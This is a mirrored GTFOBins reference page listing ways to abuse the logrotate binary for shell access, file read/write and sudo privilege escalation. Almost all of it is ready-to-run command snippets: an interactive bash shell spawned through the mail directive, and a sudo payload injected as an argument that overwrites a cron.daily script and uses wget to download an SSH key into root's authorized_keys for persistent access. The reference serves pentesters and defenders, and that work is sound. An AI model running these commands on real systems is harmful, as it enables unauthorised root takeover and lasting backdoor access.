1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-26 09:06:02 +02:00
GTFOBins.github.io/_gtfobins/logrotate.md
2023-10-03 15:26:02 +02:00

1.6 KiB

functions
command shell file-write file-read sudo
description code
Requires a logrotate policy which uses the `mail` directive. A hash should be used as the final character in the command, as it is run with a few arguments. COMMAND='id &> /tmp/output #' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF logrotate -m "$TF" -v -f logrotate.policy
description code
Requires a logrotate policy which uses the `mail` directive. COMMAND='/usr/bin/bash -i #' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF logrotate -m "$TF" -v -f logrotate.policy
description code
Creates or overwrites the file with the exact text `logrotate state -- version 2` LFILE=file_to_write logrotate -s "$LFILE" logrotate.policy
description code
Creates or overwrites the file with junk data in combination with arbitrary data. LFILE=file_to_write DATA=data_to_write logrotate -l "$LFILE" "$DATA"
description code
Reads the first 'word'. LFILE=file_to_read logrotate "$LFILE"
description code
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. Note that this will overwrite `/etc/cron.daily/man-db` with a cronjob. sudo logrotate -l /etc/cron.daily/man-db '2>/dev/null;wget https://example.com/ssh.key -O /root/.ssh/authorized_keys2; exit 0;'